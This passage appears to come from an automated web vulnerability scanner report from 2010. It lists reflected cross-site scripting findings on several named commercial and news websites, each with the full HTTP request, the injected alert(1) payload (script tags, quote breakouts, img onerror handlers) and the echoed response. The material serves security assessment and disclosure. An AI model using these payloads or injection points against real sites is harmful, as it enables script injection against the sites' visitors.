Set-Cookie: Apache=174.121.222.18.1291768898731966; path=/; expires=Tue, 03-Dec-30 00:41:38 GMT
X-Powered-By: PHP/5.2.10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE"
Set-Cookie: PHPSESSID=nja7pdckk1p8p265igbsfpdss1; path=/; domain=www.carpricesecrets.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:41:38 GMT; path=/; domain=www.carpricesecrets.com
Set-Cookie: landing_id=70445853; expires=Wed, 15-Dec-2010 00:41:38 GMT; path=/; domain=www.carpricesecrets.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28358
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Get the Lowest New Car Price Quotes at CarPriceSecrets.com</tit ...[SNIP]... <script language="JavaScript"> s_clven.server="www.carpricesecrets.com"; s_clven.channel="/mercury26138"-alert(1)-"0ee04136db8"; s_clven.pageName="DLP - Home"; s_clven.prop1="1"; s_clven.eVar1="1"; s_clven.prop7="999"; s_clven.prop8="999"; s_clven.eVar32="Paid"; s_clven.eVar35="MSN"; s_clven.eVar40="MSN"; s_clven.eVar7 ...[SNIP]...
The value of the t_se request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6fcfc"%3balert(1)//65f5a7af97d was submitted in the t_se parameter. This input was echoed as 6fcfc";alert(1)//65f5a7af97d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mercury?t_se=msn6fcfc"%3balert(1)//65f5a7af97d&t_campid=1295942&t_adgpid=147006720&t_adid=262573534&t_keyid=1323580327&t_mtype=c HTTP/1.1
Host: www.carpricesecrets.com
Proxy-Connection: keep-alive
Referer: http://cm.npc-medianews.overture.com/js_1_0/?config=2554942840&type=misc&ctxtId=misc&keywordCharEnc=utf8&source=npc_mng_sanjosemercurynews_t2_ctxt&adwd=728&adht=90&ctxtUrl=http%3A%2F%2Fwww.mercurynews.com%2F&du=1&cb=1291762313102&ctxtContent=%3Chead%3E%3Cmeta%20name%3D%22description%22%20content%3D%22San%20Jose%20Mercury%20News%20-%20breaking%20news%2C%20weather%2C%20traffic%2C%20shopping%2C%20sports%2C%20jobs%2C%20cars%2C%20homes%20and%20local%20events%22%3E%3Cmeta%20name%3D%22keywords%22%20content%3D%22San%20Jose%20Mercury%20News%20Silicon%20Valley%22%3E%3Ctitle%3EHome%20-%20San%20Jose%20Mercury%20News%3C%2Ftitle%3E%3Cscript%20language%3D%22JavaScript%22%3E%0Adocument.write('%3Clink%20rel%3D%22shortcut%20icon%22%20href%3D%22http%3A%2F%2Fextras.mnginteractive.com%2Flive%2Fmedia%2FfavIcon%2Fmercury%2Ffavicon.ico%22%20type%3D%22image%2Fx-icon%22%3E')%3B%0Adocument.write('%3Clink%20rel%3D%22icon%22%20href%3D%22http%3A%2F%2Fextras.mnginter
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 00:37:17 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: Apache=174.121.222.18.1291768637415138; path=/; expires=Tue, 03-Dec-30 00:37:17 GMT
X-Powered-By: PHP/5.2.10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE"
Set-Cookie: PHPSESSID=7f0frbsr23sg52h5vr938p5rh6; path=/; domain=www.carpricesecrets.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: detid=1002; expires=Wed, 15-Dec-2010 00:37:17 GMT; path=/; domain=www.carpricesecrets.com
Set-Cookie: landing_id=70445588; expires=Wed, 15-Dec-2010 00:37:17 GMT; path=/; domain=www.carpricesecrets.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 27782
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Get the Lowest Mercury Price Quotes at CarPriceSecrets.com</tit ...[SNIP]... secrets.com"; s_clven.channel="/mercury"; s_clven.pageName="DLP - Make"; s_clven.prop1="1"; s_clven.eVar1="1"; s_clven.prop7="28"; s_clven.prop8="999"; s_clven.eVar32="Paid"; s_clven.eVar35="Msn6fcfc";alert(1)//65f5a7af97d"; s_clven.eVar40="Msn6fcfc";alert(1)//65f5a7af97d"; s_clven.eVar7="Step1: Quote-Make Landing Page"; s_clven.events="event8"; s_clven.linkTrackVars="events"; s_clven.linkTrackEvents="event6";
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66a23"-alert(1)-"fcaab4586c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 404 Not Found
Date: Wed, 08 Dec 2010 00:37:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.10
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDi CONi OUR DELa SAMi IND PHY ONL UNI COM NAV INT STA PRE"
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28376
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-US"> <head> <title>Get the Lowest New Car Price Quotes at CarPriceSecrets.com</tit ...[SNIP]... <script language="JavaScript"> s_clven.server="www.carpricesecrets.com"; s_clven.channel="/page_footer_frame.php66a23"-alert(1)-"fcaab4586c4"; s_clven.pageName="DLP - Home"; s_clven.prop1="1"; s_clven.eVar1="1"; s_clven.prop7="999"; s_clven.prop8="999"; s_clven.eVar32="Paid"; s_clven.eVar35="Other"; s_clven.eVar40="Other"; s_clven.e ...[SNIP]...
The value of the body request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd418"%3balert(1)//e4085e9112c was submitted in the body parameter. This input was echoed as dd418";alert(1)//e4085e9112c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the make request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f52f4"%3balert(1)//3f9bb776ae6 was submitted in the make parameter. This input was echoed as f52f4";alert(1)//3f9bb776ae6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the model request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e4618"%3balert(1)//6061c83775c was submitted in the model parameter. This input was echoed as e4618";alert(1)//6061c83775c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the zip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9da9c"><script>alert(1)</script>160b9bba87f was submitted in the zip parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the zip request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd5a3"%3balert(1)//92b78caf9f0 was submitted in the zip parameter. This input was echoed as dd5a3";alert(1)//92b78caf9f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
4.124. http://www.chefuniforms.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.chefuniforms.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cc4c"><script>alert(1)</script>ffe87a90c50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?3cc4c"><script>alert(1)</script>ffe87a90c50=1 HTTP/1.1
Host: www.chefuniforms.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <HTML> <HEAD> <TITLE>Chef Uniforms| Chef Coats| Chef Pants| Restaurant Uniforms| UA Chef</TI ...[SNIP]... <a href="http://espanol.chefuniforms.com/?language=ES&3cc4c"><script>alert(1)</script>ffe87a90c50=1"> ...[SNIP]...
The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 22a41<script>alert(1)</script>3dcb1d257de was submitted in the c parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mngi/tracking/track?s=571&c=1679114222a41<script>alert(1)</script>3dcb1d257de&t=VIEWED&n=1 HTTP/1.1
Host: www.contracostatimes.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EMETA_COOKIE_CHECK_MNGI=1; EMETA_NCLICK_MNGI=1; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI
The value of the n request parameter is copied into the HTML document as plain text between tags. The payload 93341<script>alert(1)</script>7159b8e8cfb was submitted in the n parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mngi/tracking/track?s=571&c=16791142&t=VIEWED&n=193341<script>alert(1)</script>7159b8e8cfb HTTP/1.1
Host: www.contracostatimes.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EMETA_COOKIE_CHECK_MNGI=1; EMETA_NCLICK_MNGI=1; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI
The value of the s request parameter is copied into the HTML document as plain text between tags. The payload bab11<script>alert(1)</script>0508f974553 was submitted in the s parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mngi/tracking/track?s=571bab11<script>alert(1)</script>0508f974553&c=16791142&t=VIEWED&n=1 HTTP/1.1
Host: www.contracostatimes.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EMETA_COOKIE_CHECK_MNGI=1; EMETA_NCLICK_MNGI=1; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI
The value of the t request parameter is copied into the HTML document as plain text between tags. The payload 89e7f<script>alert(1)</script>2873876c36c was submitted in the t parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /mngi/tracking/track?s=571&c=16791142&t=VIEWED89e7f<script>alert(1)</script>2873876c36c&n=1 HTTP/1.1
Host: www.contracostatimes.com
Proxy-Connection: keep-alive
Referer: http://www.contracostatimes.com/ci_16791142?source=top-hp-promo-box-photo&nclick_check=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EMETA_COOKIE_CHECK_MNGI=1; EMETA_NCLICK_MNGI=1; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI
The value of the startImage request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dc282%3balert(1)//343e8b95b71 was submitted in the startImage parameter. This input was echoed as dc282;alert(1)//343e8b95b71 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /portlet/article/html/render_gallery.jsp?articleId=16791142&siteId=571&startImage=1dc282%3balert(1)//343e8b95b71 HTTP/1.1
Host: www.contracostatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4114"><script>alert(1)</script>9d120642e10 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11c4114"><script>alert(1)</script>9d120642e10/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 39436
Content-Type: text/html
Set-Cookie: PHPSESSID=d6a73598f9978391c2205ab5e9145c2b; path=/
Expires: Wed, 08 Dec 2010 01:53:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:00 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <form ID='formInvisible' action="/11c4114"><script>alert(1)</script>9d120642e10/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9f24"><script>alert(1)</script>a0cb6e97ed4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27c9f24"><script>alert(1)</script>a0cb6e97ed4/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 39436
Content-Type: text/html
Set-Cookie: PHPSESSID=8f59c76a9cacce8e9532d4697b0120ae; path=/
Expires: Wed, 08 Dec 2010 01:53:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:26 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <form ID='formInvisible' action="/11/27c9f24"><script>alert(1)</script>a0cb6e97ed4/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload badca"><script>alert(1)</script>840eb5b57bb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10badca"><script>alert(1)</script>840eb5b57bb/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 39436
Content-Type: text/html
Set-Cookie: PHPSESSID=a96889acab8e90335903fdcfa578c9bc; path=/
Expires: Wed, 08 Dec 2010 01:54:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:54:01 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <form ID='formInvisible' action="/11/27/10badca"><script>alert(1)</script>840eb5b57bb/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86eea"><script>alert(1)</script>20250ebeef8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S86eea"><script>alert(1)</script>20250ebeef8/landing_urban_v3.html HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 39436
Content-Type: text/html
Set-Cookie: PHPSESSID=e1e3fc513c1e3f5b5cf41aea57029c60; path=/
Expires: Wed, 08 Dec 2010 01:54:34 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:54:34 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <form ID='formInvisible' action="/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S86eea"><script>alert(1)</script>20250ebeef8/landing_urban_v3.html"> ...[SNIP]...
The value of the feedID request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64b58"><script>alert(1)</script>7b6e2d2f2d2 was submitted in the feedID parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html?blockID=361571&feedID=587964b58"><script>alert(1)</script>7b6e2d2f2d2 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 18082
Content-Type: text/html
Set-Cookie: PHPSESSID=97bf35ad0f489bcd4c706121e3a217dd; path=/
Expires: Wed, 08 Dec 2010 01:52:33 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:52:33 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <a href="javascript:void(0);popup('/pages/email_landing?share_url=/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html?blockID=361571^feedID=587964b58"><script>alert(1)</script>7b6e2d2f2d2^',300,500);" rel="nofollow"> ...[SNIP]...
4.135. http://www.csnbayarea.com/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8debb"><script>alert(1)</script>64a6bf924c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html?blockID=361571&feedID=5879&8debb"><script>alert(1)</script>64a6bf924c5=1 HTTP/1.1
Host: www.csnbayarea.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: Apache
Content-Length: 54243
Content-Type: text/html
Set-Cookie: PHPSESSID=9cebb891959167bd241885fe826bb63e; path=/
Expires: Wed, 08 Dec 2010 01:53:09 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 08 Dec 2010 01:53:09 GMT
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> ...[SNIP]... <a href="javascript:void(0);popup('/pages/email_landing?share_url=/11/27/10/Urban-Sorting-Out-the-Giants-Shortstop-S/landing_urban_v3.html?blockID=361571^feedID=5879^8debb"><script>alert(1)</script>64a6bf924c5=1^',300,500);" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ef97f"><img%20src%3da%20onerror%3dalert(1)>a34f8ea287a was submitted in the REST URL parameter 2. This input was echoed as ef97f"><img src=a onerror=alert(1)>a34f8ea287a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Cupertinoef97f"><img%20src%3da%20onerror%3dalert(1)>a34f8ea287a/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:45:22 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:45:23 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:45:23 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19642
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d79cc'><img%20src%3da%20onerror%3dalert(1)>34805d93fde was submitted in the REST URL parameter 2. This input was echoed as d79cc'><img src=a onerror=alert(1)>34805d93fde in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Cupertinod79cc'><img%20src%3da%20onerror%3dalert(1)>34805d93fde/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:49:52 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 02:49:54 GMT; path=/
Cache-Control: max-age=1
Expires: Wed, 08 Dec 2010 02:49:53 GMT
Vary: Accept-Encoding,User-Agent
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Content-Length: 19637
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE>Toyota Dealer Servin ...[SNIP]... <img src='http://images.carprices.com/pricebooks_data/usa/colorized/2010/Toyota/View/Sienna/CE/5328_8R5.jpg' alt='Cupertinod79cc'><img src=a onerror=alert(1)>34805d93fde Toyota - 2010 Toyota Sienna 8 Passenger CE' style='padding-bottom:10px;'/> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c033f<img%20src%3da%20onerror%3dalert(1)>cbee9737293 was submitted in the REST URL parameter 2. This input was echoed as c033f<img src=a onerror=alert(1)>cbee9737293 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota-Dealer/Cupertinoc033f<img%20src%3da%20onerror%3dalert(1)>cbee9737293/About%20Us/ HTTP/1.1
Host: www.fremonttoyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK
Date: Wed, 08 Dec 2010 02:53:54 GMT
Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1
X-Powered-By: PHP/5.3.2-1ubuntu4.5
